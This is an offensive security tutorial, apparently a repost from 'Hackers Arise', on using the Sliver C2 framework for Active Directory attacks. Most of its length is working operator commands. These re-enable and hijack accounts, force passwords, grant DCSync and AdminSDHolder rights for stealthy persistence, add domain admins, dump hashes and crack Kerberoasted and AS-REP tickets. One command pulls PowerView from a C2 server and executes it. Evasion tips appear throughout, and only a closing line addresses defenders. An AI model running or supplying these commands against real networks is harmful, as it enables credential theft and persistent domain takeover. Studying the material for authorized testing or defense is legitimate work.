National Cyber Warfare Foundation (NCWF)

Sliver can be used to find weak permissions and exposed accounts. Hackers may steal credentials, gain long-term high-level access, and spread through the network.

The post Sliver in a Cyberwar – Kerberoasting and DACL Abuse first appeared on Hackers Arise.

Welcome back cyberwarriors!

In this part of the series, we continue studying Sliver’s capabilities alongside supporting tools used in post-exploitation and Active Directory (AD) abuse. In the previous section, we explored lateral movement and how to interconnect compromised hosts to strengthen our foothold within a network. Today, we’ll focus on Discretionary Access Control List (DACL) abuse, including methods like Kerberoasting, DCSync, AdminSDHolder manipulation, and DACL-based persistence. Tools such as Rubeus, BloodyAD, SharpHound, and BloodHound will feature prominently in this chapter.

Understanding DACL

A Discretionary Access Control List (DACL) is a component of an Active Directory object’s security descriptor that defines who can perform what actions on the object. Each permission is represented by an Access Control Entry (ACE). For example, permissions might allow a user to reset passwords, delete objects, or modify the access list itself.

DACL abuse involves taking advantage of overly permissive or misconfigured ACEs, such as GenericAll (full control), WriteDACL (modify permissions), WriteOwner (change ownership), or AllExtendedRights (e.g., password reset rights). These permissions can allow unauthorized privilege escalation, lateral movement, or persistence within a domain, often without requiring administrative credentials or triggering alerts.

This technique is often overlooked because such permissions can be inherited or delegated, making them appear legitimate. Additionally, unless specific ACL change auditing is in place, these modifications tend to leave minimal traces.

Collecting AD Data with SharpHound

SharpHound is the data collection component for BloodHound. When executed on a domain-joined system, it gathers a broad range of data: user and group memberships, session information, ACLs, trust relationships, and local administrator mappings.

Example commands for Sliver-integrated BloodHound collection:

sliver (session) > sharp-hound-3 -- -c All --zipfilename target

running sharohound version 3 with sliver

For newer BloodHound versions:

sliver (session) > sharp-hound-4 -- -c All --zipfilename target_v4

running sharphound version 4 with sliver

Upload the resulting archive into BloodHound. Processing time will depend on domain size and complexity.

Visualizing AD Relationships with BloodHound

Once the data is processed, BloodHound allows for in-depth exploration of Active Directory relationships and potential attack paths.

Viewing Objects

Search for specific users or groups to examine their access and control relationships. Even low-privileged users can be significant if misconfigurations exist.

Once you click on the user icon, you get to see a thorough list of valuable information such as RDP connections, DCOM privileges, SQL and Local admin rights.

Outbound Object Control

This metric reflects how many AD objects a user can influence through direct or inherited ACEs, useful for identifying privilege escalation routes.

viewing dcsync rights in the domain with bloodhound

Transitive Object Control

A user might not directly control high-value targets, but through a chain of misconfigurations, may still exert influence. BloodHound calculates these indirect paths, helping identify potential escalation vectors.

Abuse via DACL Modification

To maintain long-term access or escalate privileges, attackers can modify DACLs using tools like BloodyAD.

Re-enabling Disabled Accounts

Rather than creating new accounts (which can be suspicious), attackers may opt to re-enable existing but disabled users. For example:

c2 > pip3 install bloodyad

c2 > proxychains4 -q bloodyAD --host SERV-DC1 -u admin -p password remove uac nika -f ACCOUNTDISABLE

c2 > proxychains4 -q bloodyAD --host SERV-DC1 -u admin -p password set password nika “P@ssw0rd123!”

After that we test nika’s account:

c2 > proxychains nxc smb 192.168.2.47 -u nika -p “P@ssw0rd123!”

forcing a new password and enabling an account with bloodyAD

And it worked! Now we control nika’s account which will be assigned new permissions in the domain. Note, that you can run these commands with NTLM hash as well.

If only an NTLM hash is available:

c2 > proxychains4 -q bloodyAD --host SERV-DC1 -u admin -p :NTLMhash set password nika “P@ssw0rd123!”

Assigning Excessive Rights

DCSync is an attack that allows a compromised account to impersonate a Domain Controller and request directory replication data, including user password hashes (such as KRBTGT or Administrator), using a legitimate function of the Directory Replication Service Remote Protocol.

Here is how the output of this attack looks like. In some cases, due to a complex domain structure you might be lucky to acquire cleartext credentials.

dcsync when reversible encryption is enabled

The AdminSDHolder object defines the template ACL applied to protected AD objects such as Domain Admins and Enterprise Admins, regularly re-applied by the SDProp service (every 60 minutes). If an attacker has GenericAll permission on the AdminSDHolder object, they can effectively grant complete control over all privileged accounts in the domain. Because SDProp propagates that ACL to every protected account automatically, any malicious rights added to AdminSDHolder persist, even if later removed manually

Now we are ready to assign the needed rights to the accounts we control:

c2 > proxychains4 bloodyAD --host SERV-DC1 -u admin -p password add dcsync galina

c2 > proxychains4 bloodyAD --host SERV-DC1 -u admin -p password add genericAll "CN=AdminSDHolder,CN=System,DC=DOMAIN,DC=RU" galina

adding dacl persistence AdminSDHolder and DCSync rights with bloodyAD

Recovering Access via Persistence

If you get caught during lateral movement or an admin decides to change his password, here is how you’d restore your access using the DACL persistence

Add a new domain admin:

c2 > proxychains4 bloodyAD --host SERV-DC1 -u galina -p password add groupMember 'Domain Admins' fakeadmin

Force a new password for a domain admin:

c2 > proxychains4 bloodyAD --host SERV-DC1 -u galina -p password set password admin “P@ssw0rd”

Extracting credentials with DCSync using a password:

c2 > proxychains4 secretsdump.py domain.ru/galina:P@ssw0rd@dc-ip

Extracting credentials with DCSync using a hash:

c2 > proxychains4 secretsdump.py domain.ru/galina@dc-ip -hashes :NTLMhash

For full documentation on BloodyAD:

https://github.com/CravateRouge/bloodyAD/wiki/User-Guide

Kerberoasting

Kerberoasting is a technique hackers use after gaining access to any domain user account. It lets an attacker ask for a Kerberos service ticket for a service account in Active Directory, because any legitimate user can do that. That ticket is encrypted using the service account’s password hash. The attacker takes that encrypted ticket offline and uses tools like Hashcat or John the Ripper to crack it and recover the actual password. Once they have the password, they can log in using that service account and gain whatever access it has in the network.
To find Kerberoastable account in BloodHound press “List all Kerberoastable Accounts” or “Find Kerberoastable Members of High Value Groups”

viewing kerberoastable accounts with bloodhound

Command-line detection using Sliver and PowerView:

c2 > echo “Get-NetUser -spn | select samaccountname,description” | base64

converting a powerview query into base64

sliver (session) > sharpsh -- '-u http://C2:8000/PowerView.ps1 -e -c “BASE64”'

running powerview within sliver to list kerberoastable users

In a constrained environment use native commands:

PS > setspn.exe -Q */*

using setspn.exe to view kerberoastable users in a strict environment

In BloodHound you can see we have three domain admins vulnerable to Kerberoasting.

Imagine a scenario where you compromised a user with GenericAll over Help Desk, but your user does not have the same rights as Help Desk does. You can try to force new passwords or add a new user, but those are noisy attacks and you are not recommended to do that. Instead, let’s assign an SPN to a member of Help Desk and try to crack his hash offline.

Assign an SPN:

c2 > proxychains4 -q bloodyAD --host SERV-DC1 -u admin -p password set object redkin servicePrincipalName -v http/SERV-1C.DOMAIN.RU

Then roast the account:

sliver (session) > c2tc-kerberoast roast redkin

Copy this hash into a file and convert it to Hashcat format

c2 > nano redkin_convert_kerberos.txtc2 > python3 TicketToHashcat.py redkin_convert_kerberos.txt

converting the kerberos ticket into a hascat format

Or roast with Rubeus using the hashcat format instead:

sliver (session) > inline-execute-assembly /root/tools/Rubeus.exe 'kerberoast /user:admin /format:hashcat /nowrap'

After the ticket is yours, you can proceed cracking it with hashcat depending on the encryption format. In our case it was 23 which is RC4 (-m 13100):

c2 > hashcat -m 13100 hash.txt wordlist.txt # For RC4 encryption

AS-REP Roasting

AS-REP Roasting is a Kerberos attack that targets user accounts in Active Directory which have Kerberos pre‑authentication turned off. Under normal circumstances, when a user requests a Ticket Granting Ticket (TGT), they must prove their identity by encrypting a timestamp with their password hash, that is pre‑authentication. If that check is disabled for an account, an attacker can send an AS‑REQ for that account without knowing the password and the Domain Controller will reply with an AS‑REP message containing data encrypted with the user’s password hash. Once the password is recovered, you can log in as that user and escalate privileges, move laterally, or maintain persistence without raising alarms. This technique is very effective in environments with weak password policies or misconfigured Kerberos settings

You can find users vulnerable to this attack in BloodHound by selecting “Find AS-REP Roastable Users (DontReqPreAuth)”

Here is how you would approach a user with DontReqPreAuth:

sliver (session) > inline-execute-assembly /root/tools/Rubeus.exe 'asreproast /format:hashcat /user:bob /nowrap'

Crack the resulting hash using Hashcat mode 18200 (AES encryption):

c2 > hashcat -m 18200 hash.txt wordlist.txt

Summary

Misconfigured DACLs and weak Kerberos settings turn ordinary domain features into powerful attack paths: attackers can abuse permissions (GenericAll, WriteDACL, AdminSDHolder) and use DCSync to steal hashes, or run Kerberoasting and AS-REP roasting to crack service and pre-auth-disabled accounts offline. Combined with data collection and mapping (SharpHound/BloodHound), BloodyAD and Rubeus, these techniques let you escalate privileges, persist, and move laterally with little noise. Defenders must enforce strict ACL hygiene, rotate and harden service accounts, enable Kerberos best practices, and audit ACL changes to prevent sustained compromise.